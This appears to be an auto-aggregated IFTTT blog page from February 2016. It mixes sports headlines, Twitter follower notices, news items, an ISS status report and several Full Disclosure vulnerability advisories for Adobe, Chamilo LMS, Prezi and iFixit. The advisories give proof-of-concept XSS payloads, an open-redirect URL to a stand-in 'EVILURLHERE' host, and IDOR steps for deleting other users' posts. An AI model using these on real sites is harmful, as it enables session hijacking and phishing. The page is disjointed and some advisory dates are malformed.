Latest YouTube Video

Saturday, February 20, 2016

I have a new follower on Twitter


Marco



Following: 3 - Followers: 0

February 20, 2016 at 10:56PM via Twitter http://twitter.com/marco651211

Orioles: P Yovani Gallardo agrees to 3-year, $35 million contract; went 13-11 with 3.42 ERA last year - multiple reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Forum

It is possible when you install the Anonymous Posting plugin located at http://ift.tt/1ouVAl6. Average of ratings: -.

from Google Alert - anonymous http://ift.tt/1L1JSZz
via IFTTT

I have a new follower on Twitter


Young Alcoholics
Why overthink when you can over drink?
Turn on Notifications!

Following: 244 - Followers: 17260

February 20, 2016 at 03:32PM via Twitter http://twitter.com/YoungAIcoholics

Anonymous Donation Allows Vermillion County K9 Officer To Receive Vest

Vermillion County K9 officer Byron received a much needed gift. The department has a go fund me page set up to take donations to supply the K9 ...

from Google Alert - anonymous http://ift.tt/1oBiGqV
via IFTTT

Alcoholics Anonymous accused of discrimination

Talk about a lack of fellowship — non-believers battling the bottle have been booted from Alcoholics Anonymous in Toronto. Now Larry Knight is ...

from Google Alert - anonymous http://ift.tt/1PNEs38
via IFTTT

Donald Trump — Boycott Apple! But Still Tweeting from an iPhone

As the groundwork for the presidential election is being cooked up in the United States to be held on 8 November 2016, candidates are very busy in sharpening their skills to gain the vote of reliance. By struggling to gain an upper hand in the National issues at this moment could benefit the candidates bring them into the limelight and stardom. Donald Trump (a Presidential Candidate


from The Hacker News http://ift.tt/1mO3YuH
via IFTTT

FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable

Another Surprising Twist in the Apple-FBI Encryption Case: The Apple ID Passcode Changed while the San Bernardino Shooter's iPhone was in Government Custody. Yes, the Federal Bureau of Investigation (FBI) has been screwed up and left with no option to retrieve data from iPhone that belonged to San Bernardino shooter Syed Farook. Apple has finally responded to the Department of Justice (


from The Hacker News http://ift.tt/1KxATPK
via IFTTT

Linux Foundation Launches 'Zephyr', a tiny OS for Internet of Things

The 21st century is witnessing a great change over in the daily life of folks with the advent of IoT devices that are capable of talking to each other without any human intervention. Yeah! Now you do not have to individually cascade an instruction to each of your home devices to accomplish a task. All have gone automated with the actuators and sensors which are infused into the home


from The Hacker News http://ift.tt/1TrCSqj
via IFTTT

NGC 2403 in Camelopardalis


Magnificent island universe NGC 2403 stands within the boundaries of the long-necked constellation Camelopardalis. Some 10 million light-years distant and about 50,000 light-years across, the spiral galaxy also seems to have more than its fair share of giant star forming HII regions, marked by the telltale reddish glow of atomic hydrogen gas. The giant HII regions are energized by clusters of hot, massive stars that explode as bright supernovae at the end of their short and furious lives. A member of the M81 group of galaxies, NGC 2403 closely resembles another galaxy with an abundance of star forming regions that lies within our own local galaxy group, M33 the Triangulum Galaxy. Spiky in appearance, bright stars in this colorful galaxy portrait of NGC 2403 are in the foreground, within our own Milky Way. via NASA http://ift.tt/1PWr22G

Friday, February 19, 2016

mojotech/modernator

Moderate. Contribute to modernator development by creating an account on GitHub.

from Google Alert - anonymous http://ift.tt/1oyXwcT
via IFTTT

Remove anonymous user from member fields

Remove anonymous user from member fields. Active. Project: Drupal PM (Project Management). Version: 7.x-3.x-dev. Component: Code. Priority:.

from Google Alert - anonymous http://ift.tt/1PLUevv
via IFTTT

Ravens: TE Nick Boyle suspended 10 games for violating league's PED policy; also was suspended final 4 games last season (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Orioles: 3B Manny Machado should \"determine how high the 2016 Birds will fly,\" writes Eddie Matz (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles Podcast: Manager Buck Showalter tells Baseball Tonight his team has \"four points of emphasis\" for this season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

via IFTTT

anonymous-sums

anonymous-sums. Provides anonymous sum types for Haskell. Kind of like Either , but for multiple types rather than just two. This is boring and tedious ...

from Google Alert - anonymous http://ift.tt/1TqqJ4K
via IFTTT

I have a new follower on Twitter


SportsTalkLine.com
We search the World of Sports, then we talk about it. #WeFollowBack
SoCal
http://t.co/2Oy11Ybe
Following: 26355 - Followers: 25346

February 19, 2016 at 08:30AM via Twitter http://twitter.com/SportsTalkLine

Now We Know — Apple Can Unlock iPhones, Here's How to Hack-Proof your Device

Here's How to Hack-Proof your iOS Device fro Unlock iPhone
Apple has been asked to comply with a federal court order to help the FBI unlock an iPhone 5C by one of the terrorists in the San Bernardino mass shootings that killed 14 and injured 24 in December.

The FBI knows that it can not bypass the encryption on the iPhone, but it very well knows that Apple can make a way out that could help them try more than 10 PINs on the dead shooter's iPhone without getting the device's data self-destructed.

Although Apple refused to comply with the court order and has always claimed its inability to unlock phones anymore, the FBI so cleverly proved that Apple does have a technical way to help feds access data on a locked iOS device.

And this is the first time when Apple has not denied that it can not unlock iPhones, rather it simply refused to build the FBI a Backdoor for the iPhone, in an attempt to maintain its users trust.

So, now we know that Apple is not doing so, but it has the ability to do so.

Now, when you know there are chances that your unlocked iPhone can be accessed by the government even if you have enabled "Auto-Destruct Mode" security feature on your device, you need to protect your iPhone beyond just 4/6-digit passcode.

How to Hack-Proof your iPhone?


Yes, it is possible for you to protect yourself from government snooping just by setting a strong passcode on your iPhone — passcode that the FBI or any government agency would not be able to crack even if they get iPhone backdoor from Apple.

Without wasting much of your time, here's one simple solution:

  • Simply Set at least random 11-digit numeric passcode for your iPhone.


Here's why (FBI Can't Crack It):


There is only one way, i.e. Brute Force attack, to crack your iPhone passcode. This is what the FBI is demanding from Apple to create a special version of iOS that increases the brute force attempts and ignores the data erasure setting.

iPhones intentionally encrypt its device's data in such a way that one attempt takes about 80 milliseconds, according to Apple.

So, if your iPhone is using a 6-digit passcode and there are 1 Million possible combinations as a whole, it would take maximum time of 22 hours or on average 11 hours to successfully unlock iPhone.

However, if you are using a longer passcode such as a random 11-digit passcode, it will take up to 253 years, and on average 127 years to unlock iPhone.

Doing so will make the FBI or any other agency unable to unlock your iPhone; not unless they have hundreds of years to spare.

To set a strong passcode, click 'Passcode options,' select 'Custom numeric code,' and then enter your new but random passcode.

Things to Avoid While Setting a Passcode


1. Do Not Use a Predictable Passcode: Avoid choosing a predictable string such as your birth dates, phone numbers, or social security numbers, as these are first priorities of attackers to try.

2. Do Not Use iCloud Backups: Avoid using an iCloud backup because doing so will enable the attacker to get a copy of all your iPhone’s data from Apple’s server, where your passcode no longer protects it. This will eliminate the need to guess your passcode.

3. Do Not Use Your Fingerprint: We have seen data breaches that exposed fingerprints of online users. Also, it is possible to get fingerprint copy or real fingerprint from a suspect's corpse. So, using your fingerprint could also end up unlocking your iPhone in less time.

So, by choosing a strong passcode, the FBI or any other agency will not be able to unlock your encrypted iPhone, even if they install a vulnerable version of iOS on it.

Warning: You need to remember your passcode, whatever you set, because no one except you would be able to unlock your iPhone. Once you forgot your passcode, there is nothing you can do to get your important data and even access to your iPhone back.


from The Hacker News http://ift.tt/1PWadov
via IFTTT

[FD] Adobe - Multiple Client Side Cross Site Scripting Web Vulnerabilities

Document Title: =============== Adobe - Multiple Client Side Cross Site Scripting Web Vulnerabilities References (Source): ==================== http://ift.tt/1Vg0xZN PSIRT ID: 4260 / 4261 Release Date: ============= 2016-02-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1628 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== Whether it is a smartphone or tablet app, a game, a video, a digital magazine, a website, or an online experience, chances are that it was touched by Adobe technology. Our tools and services enable our customers to create groundbreaking digital content, deploy it across media and devices, and then continually measure and optimize it based on user data. By providing complete solutions that combine digital media creation with data-driven marketing, we help businesses improve their communications, strengthen their brands, and ultimately achieve greater business success. (Copy of the Vendor Homepage: http://ift.tt/1m8vdyM) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple client-side vulnerabilities in the official adobe online-service web-application. Vulnerability Disclosure Timeline: ================================== 2015-10-29: Researcher Notification & Coordination (Daniel Díez Tainta - DaniLabs) 2015-10-30: Vendor Notification (Adobe PSIRT - Security Acknowledgements) 2015-11-03: Vendor Response/Feedback (Adobe PSIRT - Security Acknowledgements) 2015-02-03: Vendor Fix/Patch (Adobe - Developer Team) 2015-02-14: Security Reward (Adobe PSIRT - Security Acknowledgements) 2015-02-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Adobe Systems Product: Online Service - Web Application 2015 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple client-side web vulnerabilities has been discovered in the official Adobe (arvato) online service web-application. The first vulnerability is a Cross Site Scripting of type reflected. The second vulnerability is an open redirect is an application that takes a parameter and redirects an user to the parameter value without any validation. The vulnerability is located in the `tduid` and `url` parameter values of the arvato_redirect.html file GET method request. The `tduid` parameter receives as argument `0`. The `url` parameter receives as argument an url or javascript code. Remote attackers are able to inject script codes to the client-side browser to application GET method requests. The attack vector of the issues are client-side and the request method to inject is GET. An attacker can send an url like http://ift.tt/1jnqRwA and the request redirect to the external target url without approval. An attacker can also send a javascript code like `javascript:alert(documen.cookie)` and the request executes without secure validation. The security risk of the client-side web vulnerabilities are estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the non-persistent web vulnerabilities requires no privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicious script codes or non-persistent web module context manipulation. Request Method(s): [+] GET Vulnerable Module(s): [+] Adobe - arvato Vulnerable File(s): [+] arvato_redirect.html Vulnerable Parameter(s): [+] tduid [+] url Proof of Concept (PoC): ======================= The client-side vulnerabilities can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Cross Site Scripting http://ift.tt/1VrKWpT http://ift.tt/1KuklYV PoC: Open Redirect http://ift.tt/1VrKYhw

Source: Gmail -> IFTTT-> Blogger

[FD] Chamilo LMS - Persistent Cross Site Scripting Vulnerability

Document Title: =============== Chamilo LMS - Persistent Cross Site Scripting Vulnerability References (Source): ==================== http://ift.tt/1owNYza Video: https://www.youtube.com/watch?v=gNZsQjmtiGI Release Date: ============= 2016-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1727 Common Vulnerability Scoring System: ==================================== 3.3 Product & Service Introduction: =============================== Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors. The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge, the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus. (Copy of the Homepage: http://ift.tt/1zIpfoL ) Abstract Advisory Information: ============================== A persistent cross site scripting vulnerability has been discoverd in the official web-application Product Chamilo LMS. Vulnerability Disclosure Timeline: ================================== 2016-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A GET cross site scripting web vulnerability has been discovered in the official Netlife Photosuite Pro Content Management System. A vulnerability allows remote attackers to inject malicious script codes on the client-side of the affected web-application. The vulnerability is located in the `title` input field of the `work/upload.php` file. Remote attackers are able to inject own malicious script codes to the client-side of the affected web-application. The request method to inject is POST and the attack vector is client-side. The attacker injects the payload in the vulnerable input field to execute the code in view.php. The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persistent cross site scripting web vulnerability requires low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] work/ Vulnerable File(s): [+] upload.php [+] view.php Vulnerable Parameter(s): [+] title Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Users goes to [ Course name > Assignments > ] 2. users will follow the [Assignments] made by Course Trainer or admin of Chamilo platform . 3. Users will click on button titled as [ upload My Assignments] . 4. an upload Document is Shown and A parameter [ Title ] is vulnerable to POC Payload [">

[FD] Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability

Document Title: =============== Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability References (Source): ==================== http://ift.tt/1QCtivG Video: https://www.youtube.com/watch?v=3ApPhUIk12Y Release Date: ============= 2016-02-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1720 Common Vulnerability Scoring System: ==================================== 6.1 Product & Service Introduction: =============================== Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. It is backed up by the Chamilo Association, which has goals including the promotion of the software, the maintenance of a clear communication channel and the building of a network of services providers and software contributors. The Chamilo project aims at ensuring the availability and quality of education at a reduced cost, through the distribution of its software free of charge, the improvement of its interface for 3rd world countries devices portability and the provision of a free access public e-learning campus. (Copy of the Homepage: http://ift.tt/1zIpfoL ) Abstract Advisory Information: ============================== An Insecure Direct Object Reference vulnerability has been discoverd in the official web-application Product Chamilo LMS. Vulnerability Disclosure Timeline: ================================== 2016-02-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An insecure direct object references occurd when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for deleting another users social wall posts Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter[Message id] used to directly point to an Message id of social wall post id. Vulnerability Method(s): [+] GET Vulnerable File(s): [+] social/profile.php Vulnerable Parameter(s): [+] messageId Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1. User A goes to User B or Admin soical wall in platform : /profile.php?u=[USER ID] 2. choose any Posts related to USER B or ADMIN . and figure out the messageId of Post by replaying to it and intercept the data to show the messageId parameter. 3. User A as Remote attacker will use this link filled with messageId in last to delete others posts http://SOMESITE/CHAMILOSCRIPTPATH/main/social/profile.php?messageId=28 Security Risk: ============== The security risk of the object reference web validation vulnerability in the web-application is estimated as high. (CVSS 6.1) Credits & Authors: ================== Lawrence Amer - ( http://ift.tt/1LsmYUL ) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Investors Application - Client Side Cross Site Scripting Vulnerability

ISS Daily Summary Report – 02/18/16

  Preparation for Cygnus Unberth and Release:  The Crew has configured Cygnus and the Node 1 vestibule in preparation for Cygnus departure tomorrow. This morning, the Crew removed Intermodule Ventilation, Power/Data Jumpers, and closed the Cygnus hatch.  Once the hatch was closed, the Crew installed the Common Berthing Mechanism (CBM) Center Disk Cover and four CBM Controller Panel Assemblies (CPAs) onto an Active CBM bulkhead, then closed the Node 1 nadir hatch.   In addition, ground teams successfully checked out the Proximity (PROX) Communication Link.  Cygnus is now being powered though its Power Video Grapple Fixture (PVGF) by the Space Station Remote Manipulator System (SSRMS) and is ready for unberth tomorrow at approximately 4:10am CST with release planned to occur at 6:25am CST.   Electrostatic Levitation Furnace (ELF):  Today Peake installed a sample cartridge in the ELF chamber.  The JAXA ground team then started ELF checkout with that sample. The ELF is an experimental facility designed to levitate, melt and solidify materials employing containerless processing techniques that use the electrostatic levitation method with charged samples and electrodes. With this facility, thermophysical properties of high temperature melts can be measured and solidification from deeply undercooled melts can be achieved.   Microbiome:  Today Kelly continued his Return Minus 14 day Microbiome session by collecting body and surface samples.  Microbiome investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).   Cognition:  Kopra and Peake each performed their Flight Day 60 session of the Cognition experiment today.  The Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) investigation is a battery of tests that measure how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. Cognition includes ten brief computerized tests that cover a wide range of cognitive functions, and provides immediate feedback on current and past test results. The software used allows for real-time measurement of cognitive performance while in space.   Fine Motor Skills:  Kopra and Peake each completed sessions of the Fine Motor Skills experiment today.  During the experiment they performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity.   Today’s Planned Activities All activities were completed unless otherwise noted. BIOME – Sample Collection IMMUNO.  Saliva Sample (Session 1) Cygnus – Cygnus PROX Power Activation IMMUNO. First stress test, questionnaire data entry Body Mass Measurement Calf Volume Measurement IMMUNO. Test-Tube Blood Collection (finger) Body Mass Measurement IMMUNO. Blood Sample Processing HRF – Sample Insertion into MELFI IMMUNO. Equipment Stowage Body Mass Measurement МО-8. Closeout Ops Water Recovery System (WRS) Microbial Removal Filter (MRF) Purge [Aborted] Cygnus – Mass Property Update [Aborted] Study of veins in lower extremities SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) HDD (start). Fine Motor Skills – Test BIOME – Sample Collection Crew Departure Prep PPFS –  Experiment Ops HRF – Sample Insertion into MELFI OTKLIK. Hardware Monitoring / r/g 0030 Cygnus – Final Egress and Closeout for Departure BIOME – Equipment Stowage BLR48 – Card Exchange UDOD. Experiment Ops with DYKNANIYE-1 and SPRUT-2 Sets Assembly of Separation Unit in MRM1. Filling hoses with water Water Recovery System (WRS)  Microbial Removal Filter (MRF) Purge [Aborted] Fine Motor Skills – Test Cygnus/Node 1 Vestibule Configuration for Demate Installation of CBM Controller Panel Assembly in Node 1 Terminate transfer of water to water storage tank via MRF filter Cygnus/Node 1 Vestibule Configuration for Demate Disassemble the setup following Progress 431 (DC1) АСН-КП test as a part of ISS mated stack Fluid Shifts (FS) – Kit Reconfiguration Transition to nominal comm config in MRM1 SEISMOPROGNOZ. Download data from Control and Data Acquisition Module (МКСД) HDD (end) and start backup COSMOCARD. Setup. Starting 24-hr ECG Recording HABIT – Launching the Application ECLSS: Recycle Tank Drain, Part 1 HABIT – End Task EPO – Gathering items for EPO Scripts AstroPi and ARISS ECLSS: Recycle Tank Fill Hardware prepack for return and disposal on Soyuz 718 Vestibule Outfitting Kit (VOK) hardware stowage СОЖ Maintenance EPO – Video Recording PCS Laptop Relocation PCS Laptop Relocation INTERACTION-2. Experiment Ops Hardware prepack for return or disposal on Soyuz 718 EPO – Video Recording RWS – Hardware Setup Robotic Work Station (RWS) – Display and Control Panel (DCP) Checkout On-orbit Hearing Assessment using EARQ EPO Hardware Stow IMS Delta File Prep SAMS – Screen Cleaning Crew Departure Prep BIOME – Perspiration Collection Setup IMMUNO. Saliva Sample (Session 2) / r/g 1457 БД-2 Exercise, Day 3 XF305 – Camcorder Setup IMMUNO. Second stress test, questionnaire data entry ELF – Samples cartridge setup IMMUNO. Final Equipment Stowage URISYS Hardware Setup BIOME – Perspiration Sampling INTERACTION-2. Experiment Ops BIOME – Surface Sample Collection Water flow through Microbial Removal Filter HRF – Sample Insertion into MELFI BIOME – Equipment Stowage COGNITION – Experiment Ops and Filling Questionnaire   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. PROX/PLS Checkout   Three-Day Look Ahead: Friday, 02/19: OA-4 unberth, EMU water conductivity test, Neuromapping setup Saturday, 02/20:  Crew Off Duty, Weekly Cleaning Sunday, 02/21: Crew Off Duty     QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Override Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Shutdown Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1SE63aI
via IFTTT

[FD] Prezi Bug Bounty #5 - Client Side Cross Site Scripting & Open Redirect Vulnerability

Document Title: =============== Prezi Bug Bounty #5 - Client Side Cross Site Scripting & Open Redirect Vulnerability References (Source): ==================== http://ift.tt/1oshSDZ Release Date: ============= 2016-02-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1724 Common Vulnerability Scoring System: ==================================== 3 Product & Service Introduction: =============================== Prezi is a cloud-based presentation software based on a software as a service model. The product employs a zooming user interface (ZUI), which allows users to zoom in and out of their presentation media, and allows users to display and navigate through information within a 2.5D or parallax 3D space on the Z-axis. Prezi was officially established in 2009 by co-founders Adam Somlai-Fischer, Peter Halacsy and Peter Arvai. (Copy of the Wikipedia entry: http://ift.tt/1Mlfus5) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a client-side redirect web vulnerability in the official Prezi web-application. Vulnerability Disclosure Timeline: ================================== 2016-00-29: Researcher Notification & Coordination (Milan Solanki) 2016-00-30: Vendor Notification (Prezi Security Team) 2016-00-04: Vendor Response/Feedback (Prezi Security Team) 2016-00-16: Vendor Fix/Patch #1 (Prezi Developer Team) 2016-00-22: Security Acknowledgements (Prezi Security Team) 2016-00-17: Security Bulletin (Prezi Security Team) 2016-00-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Prezi Product: Online Service - Web Application 2016 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ An open redirect web vulnerability has been discovered in the official Prezi web-application. The bug allows remote attackers to execute external urls by the internal web-application requests via client-side. The vulnerability is located in the GET parameter of the vulnerable `track` module. The vulnerability allows an remote attacker to prepare client-side malicious urls to external sources. The request method to execute is GET and the vulnerability is located on the application-side of the online-service. The vulnerability is a classic open redirect web vulnerability. The security risk of the open redirect web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the persistent input validation web vulnerability requires no privileged user account and low or medium user interaction. Successful exploitation of the vulnerability results in client-side redirects to malicious sources or client-side phishing. Request Method(s): [+] GET Vulnerable Module(s): [+] /track Vulnerable Parameter(s): [+] URI Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Vulnerability: Open redirect in the following module: /track?type=click&enid=[UNIQUE-ID]&&&2003&&&http://EVILURLHERE.com PoC: http://ift.tt/1WvAbDm saWQ9bWFzaGFjazQyM0BnbWFpbC5jb20mdXNlcmlkPTFfMTU1MTYzJnRhcmdldGlkPSZtbj04MTE1NDQmZmw9Jm12aWQ9JmV4dHJhPSYmJg==&&&2003&&&https://facebook.com Solution - Fix & Patch: ======================= Disallow to request not whitelisted webpages and include a tag filter to the enid to prevent as well. Restrict and filter the parameter and disallow usage of special chars. Encode the GET request to prevent client-ide script code inject. Security Risk: ============== The security risk of the client-side open redirect web vulnerability in the Prezi web-application is estimated as low. (CVSS 3.0) Credits & Authors: ================== Milan A Solanki - (milans812@gmail.com) [http://ift.tt/1HTGIEr] [http://ift.tt/1WvAcad] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2016 | Vulnerability Laboratory [Evolution Security]

Source: Gmail -> IFTTT-> Blogger

[FD] ifixit Bug Bounty #6 -(Profile) Persistent Vulnerability

[FD] ifixit Bug Bounty #5 - Guide Search Persistent Vulnerability

Document Title: =============== ifixit Bug Bounty #5 - Guide Search Persistent Vulnerability References (Source): ==================== http://ift.tt/1PEQyeQ Video: http://ift.tt/1oIPKgb Release Date: ============= 2016-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1700 Common Vulnerability Scoring System: ==================================== 3.8 Product & Service Introduction: =============================== The free repair guide for everything, written by everyone. iFixit is a private company in San Luis Obispo, California. Founded in 2003 while the founders were attending Cal Poly, the company sells repair parts and publishes free wiki-like online repair guides for consumer electronics and gadgets on its web site. (Copy of the Vendor Homepage: https://www.ifixit.com/ ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered an application-side input validation web vulnerability in the official ifixit online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-12-25: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH) 2015-12-26: Vendor Notification (iFixIt Security Team) 2015-12-29: Vendor Response/Feedback (iFixIt Security Team) 2016-02-01: Vendor Fix/Patch (iFixIt Developer Team) 2016-02-15: Security Acknowledgements (iFixIt Security Team) 2016-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official ifixit online service web-application. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable modules context. The vulnerability is located in the `title name` value of the `guides` and `prerequisite guides` search modules. Remote attackers with low privileged web-application user accounts are able to inject own malicious script codes to the application-side of the affected POST/GET method request. The attack vector of the vulnerability is located on the application-side and the request method to inject is POST. The execution of the inserted payload occurs in the search module were the `guides` and `prerequisite guides` becomes available with keyword. The security risk of the filter bypass and persistent validation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires a low privileged web-application user accountand low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] `guides` [+] `prerequisite guides` Vulnerable Parameter(s): [+] title name (Guide) Affected Module(s): [+] Search Guide Proof of Concept (PoC): ======================= The persistent cross site vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. I create Guide with title name as script code payload Note: Payload - Samir"> 2. Now the attacker needs to create new Guide page 3. After the adding procedure he clicks to the details 4. In the List any prerequisite guides in the searching i write Samir and i get the title about the last Guide page 5. Samir"> Now the code XSS executes via payload metatag 6. Successful reproduce of the persistent cross site scripting vulnerability! PoC: Exploitcode
Samir">


Source: Gmail -> IFTTT-> Blogger

15-year-old Teenage Hacker Arrested Over FBI Computer Hack

15-year-old British Hacker Arrested Over FBI Computer Hack
Another 15-year-old teenager got arrested from the land of cakes, Scotland, by British Police for breaking into the FBI Systems on 16th February.

Under the Britain’s anti-hacking law, Computer Misuse Act 1990, the boy has been arrested for his role in hacking and unauthorized access to the digital material.

Federal Agents had fled to Glasgow in an attempt to carry out a raid on his home before proceeding with the boy's arrest.
"He has since been released and is the subject of a report to the procurator fiscal," a Police Spokesman told a Scottish journal.
